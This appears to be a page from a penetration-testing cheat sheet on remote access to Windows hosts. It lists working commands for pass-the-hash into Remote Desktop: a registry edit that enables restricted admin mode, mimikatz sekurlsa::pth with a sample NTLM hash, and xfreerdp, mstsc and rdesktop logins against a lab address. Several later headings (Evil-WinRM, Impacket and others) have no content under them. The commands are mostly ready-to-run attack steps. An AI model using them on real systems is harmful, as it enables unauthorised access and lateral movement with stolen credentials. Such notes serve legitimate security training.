Remote Access

Remote Desktop

If we only have the password hash, we can still use it for remote desktop if we enable restricted admin mode.

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

On Windows, it required to perform PTH with mimikatz

mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:vulnableone /ntlm:9e7c6b33d9a2dfc1c9aef53eb2837b32 /run:"mstsc.exe /restrictedadmin"

xfreeRDP

xfreerdp /v:10.10.10.10 /u:administrator /w:1820 /h:768 /cert-ignore
xfreerdp /v:10.10.10.10 /u:administrator /cert-ignore /pth:4f9163ca3b673adfff2828f368ca3763
xfreerdp /v:10.10.10.10 /u:administrator /w:1820 /h:768 /d:vulnableone.local +clipboard

mshta on Windows

mstsc.exe /RestrictedAdmin /v:$hostname
mstsc.exe /v:$hostname

rdesktop

rdesktop 10.10.10.10 -u admin -p password -d vulnableone.local
rdesktop -g 95% -u khan.chanthou -p Password123 10.10.10.10 -x m -P -z

Winrs Access

PSSession Remoting

ScriptBlock

Evil-WinRM

Impacket

Last updated